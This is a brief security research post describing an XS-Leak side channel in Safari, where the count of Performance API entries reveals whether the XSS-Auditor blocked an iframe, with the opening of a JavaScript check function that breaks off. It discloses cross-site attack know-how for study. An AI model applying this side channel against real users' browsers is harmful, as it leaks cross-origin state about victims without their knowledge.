XS-Leaks - Detecting XSS-Auditor in Safari

Safari (13.0.4 and newer) will not log iframe requests in the Performance API list when the iframe page is blocked by the XSS-Auditor. So the length of performance.getEntries() can leak the status of the Auditor.

    const check = async(url) => {
      let perfEntries = performance.getEntries().length
      return new Promise(r => {
        let frame = document.createElement('iframe')
        frame.src = url
        frame....

27 Feb. 2020 · kunte_